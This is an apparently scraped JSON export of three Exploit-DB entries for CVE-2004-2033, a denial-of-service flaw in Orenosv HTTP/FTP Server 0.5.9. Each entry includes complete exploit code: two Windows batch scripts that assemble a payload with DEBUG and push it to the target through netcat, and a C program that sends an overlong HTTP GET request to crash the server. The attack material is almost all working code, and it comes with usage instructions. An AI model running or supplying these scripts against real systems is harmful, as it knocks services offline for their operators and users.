{"exploitdb": [{"lastseen": "2016-02-02T22:37:16", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (3). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-06-02T00:00:00", "published": "2004-06-02T00:00:00", "id": "EDB-ID:24147", "href": "https://www.exploit-db.com/exploits/24147/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 3", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n \r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding.\r\n\r\n@echo off\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n:Application: Orenosv FTP Server\r\n:Vendors: http://home.comcast.net/~makataoka//orenosv060.zip\r\n:Version: <=0.6.0\r\n:Platforms: Windows\r\n:Bug: D.O.S\r\n:Date: 2004-06-02\r\n:Author: CoolICE\r\n:E-mail: CoolICE#China.com\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n;if '%1'=='' echo Usage:%0 target [port]&&goto :eof\r\n;set PORT=21\r\n;if not '%2'=='' set PORT=%2\r\n;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe\r\necho Need nc.exe&&goto :eof\r\n;DEBUG < %~s0\r\n;GOTO :run\r\n\r\nF 100 200 41\r\nrcx\r\n100\r\nndos.a\r\nw\r\nq\r\n\r\n\r\n:run\r\nnc %1 %PORT% < dos.a\r\ndel dos.a\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24147/"}, {"lastseen": "2016-02-02T22:36:59", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (1). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-05-25T00:00:00", "published": "2004-05-25T00:00:00", "id": "EDB-ID:24145", "href": "https://www.exploit-db.com/exploits/24145/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n\r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding. \r\n\r\n/****************************/\r\n PoC to crash the server\r\n/****************************/\r\n\r\n/* Orenosv HTTP/FTP Server Denial Of Service\r\n\r\n Version:\r\n orenosv059f\r\n\r\n Vendor:\r\n http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html\r\n\r\n Coded and Discovered by:\r\n badpack3t <badpack3t@security-protocols.com>\r\n .:sp research labs:.\r\n www.security-protocols.com\r\n 5.25.2004\r\n */\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar exploit[] =\r\n\r\n/* 420 A's - looks ugly but owell */\r\n\"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\\r\\n\\r\\n\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData;\r\n WORD wVersionRequested;\r\n struct hostent *pTarget;\r\n struct sockaddr_in sock;\r\n char *target;\r\n int port,bufsize;\r\n SOCKET mysocket;\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"Orenosv HTTP/FTP Server DoS by badpack3t\\r\\n\\r\\n\", argv[0]);\r\n printf(\"Usage:\\r\\n %s <targetip> [targetport] (default is 9999)\\r\\n\\r\\n\", argv[0]);\r\n printf(\"www.security-protocols.com\\r\\n\\r\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n wVersionRequested = MAKEWORD(1, 1);\r\n if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n target = argv[1];\r\n port = 9999;\r\n\r\n if (argc >= 3) port = atoi(argv[2]);\r\n bufsize = 1024;\r\n if (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\n mysocket = socket(AF_INET, SOCK_STREAM, 0);\r\n if(mysocket==INVALID_SOCKET)\r\n {\r\n printf(\"Socket error!\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Resolving Hostnames...\\n\");\r\n if ((pTarget = gethostbyname(target)) == NULL)\r\n {\r\n printf(\"Resolve of %s failed\\n\", argv[1]);\r\n exit(1);\r\n }\r\n\r\n memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n sock.sin_family = AF_INET;\r\n sock.sin_port = htons((USHORT)port);\r\n\r\n printf(\"Connecting...\\n\");\r\n if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))\r\n {\r\n printf(\"Couldn't connect to host.\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Connected!...\\n\");\r\n printf(\"Sending Payload...\\n\");\r\n if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)\r\n {\r\n printf(\"Error Sending the Exploit Payload\\r\\n\");\r\n closesocket(mysocket);\r\n exit(1);\r\n }\r\n\r\n printf(\"Payload has been sent! Check if the webserver is dead.\\r\\n\");\r\n closesocket(mysocket);\r\n WSACleanup();\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24145/"}, {"lastseen": "2016-02-02T22:37:07", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (2). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-06-02T00:00:00", "published": "2004-06-02T00:00:00", "id": "EDB-ID:24146", "href": "https://www.exploit-db.com/exploits/24146/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n \r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding.\r\n\r\n@echo on\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n:Application: Orenosv Server\r\n:Vendors: http://home.comcast.net/~makataoka/orenosv060.zip\r\n:Version: <=0.6.0\r\n:Platforms: Windows\r\n:Bug: D.O.S\r\n:Date: 2004-06-02\r\n:Author: CoolICE\r\n:E-mail: CoolICE#China.com\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n;if '%1'=='' echo Usage:%0 target [port]&&goto :eof\r\n;set PORT=9999\r\n;if not '%2'=='' set PORT=%2\r\n;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe\r\necho Need nc.exe&&goto :eof\r\n;DEBUG < %~s0\r\n;GOTO :run\r\n\r\ne 100 \"GET / HTTP/1.0\" 0D 0A\r\ne 110 \"Transfer-Encoding: Boy\" 0D 0A 0D 0A\r\nrcx\r\n2A\r\nnhttp.tmp\r\nw\r\nq\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24146/"}]}